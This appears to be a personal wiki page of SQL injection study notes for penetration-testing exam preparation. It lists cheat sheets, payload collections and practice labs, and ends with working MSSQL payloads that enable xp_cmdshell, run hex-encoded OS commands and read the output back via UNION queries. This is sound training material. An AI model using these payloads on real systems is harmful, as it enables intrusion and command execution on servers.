Skip to content

SQL Injection

Jump to bottom
Alvin Smith edited this page Jan 11, 2024 · 10 revisions

First stage

Cheat-sheet and Payload

  1. https://portswigger.net/web-security/sql-injection/cheat-sheet
  2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
  3. https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
  4. https://github.com/payloadbox/sql-injection-payload-list

Guides & Blogs:

  1. https://www.sqlinjection.net/
  2. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
  3. https://github.com/trietptm/SQL-Injection-Payloads
  4. https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet
  5. https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/

Labs and practice:

  1. https://portswigger.net/web-security/sql-injection
  2. https://github.com/Audi-1/sqli-labs
  3. https://github.com/appsecco/sqlinjection-training-app
  4. https://tryhackme.com/room/gamezone
  5. https://tryhackme.com/room/avengers
  6. https://tryhackme.com/room/uopeasy
  7. https://tryhackme.com/room/jurassicpark

Oracle cheatsheet

  1. https://cheatography.com/dormidera/cheat-sheets/oracle-sql-injection/
  2. http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html

MySQL cheetsheet

  1. https://gist.github.com/bradtraversy/c831baaad44343cc945e76c2e30927b3
  2. https://gist.github.com/hofmannsven/9164408

Sqlmap DO NOT USE IN OSCP EXAM

https://gist.github.com/A1vinSmith/2305fb2ad94541eac8f2bff43752ac78

MSSQL Write file & command injection that missed from above

';EXEC master..sp_configure 'SHOW advanced options',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'xp_cmdshell',1; RECONFIGURE WITH OVERRIDE; EXEC master..sp_configure 'SHOW advanced options',0; RECONFIGURE WITH OVERRIDE--

1';CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))--

1';DECLARE @mqvo VARCHAR(8000);SET @mqvo=0x6563686f2031;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @mqvo--

1' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT data FROM sqlmapoutput ORDER BY id FOR JSON AUTO, INCLUDE_NULL_VALUES)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(113),NULL-- kIRJ

Char is just for obsfucation.

1';DELETE FROM sqlmapoutput--

1';DECLARE @ezrn VARCHAR(8000);SET @ezrn=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @ezrn--

0x77686f616d69 is hexmical for `whoami`

1' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT data FROM sqlmapoutput ORDER BY id FOR JSON AUTO, INCLUDE_NULL_VALUES)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(112)+CHAR(113),NULL-- euoe
Clone this wiki locally